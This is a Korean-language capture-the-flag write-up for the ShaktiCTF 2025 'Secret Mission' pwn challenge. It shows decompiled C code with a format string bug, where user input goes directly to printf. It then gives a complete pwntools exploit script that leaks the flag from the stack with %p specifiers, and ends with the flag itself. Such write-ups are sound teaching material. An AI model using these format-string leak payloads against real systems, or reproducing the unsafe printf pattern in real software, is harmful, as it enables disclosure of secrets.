Home
System Hacking
🤐

[ShaktiCTF 2025][Pwn] Secret Mission

Type
CTF
년도
2025
Name
ShaktiCTF
분야
System
세부분야
FSB
2025/07/28 01:13
1 more property

# Description

Can you handle this top secret confidential case, fellow detective? Author: omelette_keychain
Plain Text
복사

# 분석

코드를 보자
int __fastcall main(int argc, const char **argv, const char **envp) { char v4; // [rsp+17h] [rbp-B9h] BYREF FILE *stream; // [rsp+18h] [rbp-B8h] char s[64]; // [rsp+20h] [rbp-B0h] BYREF char format[104]; // [rsp+60h] [rbp-70h] BYREF unsigned __int64 v8; // [rsp+C8h] [rbp-8h] v8 = __readfsqword(0x28u); stream = fopen("flag.txt", "r"); if ( !stream ) printf("Error in opening the flag file"); fgets(s, 63, stream); puts("Welcome to the Armed Detective Agency - the best and most famous detective agency in all of Yokohama!"); puts("Thank you for coming, future detective! We need your help on this very important and classified mission!"); puts("A chest full of ability crystals has been lost somewhere in this binary."); puts("Can you help us find it? (Y/n)"); __isoc99_scanf("%c", &v4); if ( v4 == 'n' ) { puts("Aww! We really looked forward to working with you! :(\n Have a nice day."); } else { puts("Great! What was your name again?"); __isoc99_scanf("%s", format); printf("Looking forward to working with you "); printf(format); } return 0; }
C
복사
간단한 Format String Bug 취약점이다.
sflag의 내용을 넣고 printf를 호출함으로, 호출 시 인자만 잘 맞춰주면 flag를 유출할 수있다.

# Payload

#!/usr/bin/env python3.12 ''' author: JangJongMin time: 2025-07-25 21:37:37 ''' from pwn import * filename = "mission_patched" libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1".strip() port = 1337 elf = context.binary = ELF(filename) context.terminal = ['tmux', 'neww'] if libcname: libc = ELF(libcname) gs = ''' set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 set $pie_base=$_base("mission_patched") b *($pie_base + 0x131C) c ''' def start(): if args.GDB: return gdb.debug(elf.path, gdbscript = gs) elif args.REMOTE: return remote(host, port) else: return process(elf.path) def log(str_, hex_): success(f"{str_} : {hex(hex_)}") def DEPTR(ptr): _12bits = [] dec = 0 while ptr != 0: _12bits.append(ptr & 0xfff) ptr = ptr >> 12 x = _12bits.pop() while len(_12bits) > 0: dec |= x dec <<= 12 y = _12bits.pop() x = x ^ y dec |= x return dec def ENPTR(pos, ptr): return (pos >> 12) ^ (ptr) p = start() s = p.send sf = p.sendafter sl = p.sendline slf = p.sendlineafter r = p.recv ru = p.recvuntil rl = p.recvline slf("(Y/n)", "Y") payload = "" for i in range(8): payload += "%{}$p".format(int(4+i)+6) slf("?", payload+'EOF') ru(b"you ") print(b''.join([bytes.fromhex(i.decode())[::-1] for i in ru("EOF")[:-3].split(b"0x") if i])) p.interactive()
Python
복사

# Flag

ShaktiCTF{th3_eXtr@ct3d_@bilitie5_v@n1sh_but_th3_fl@g_r3m@1ns}
Plain Text
복사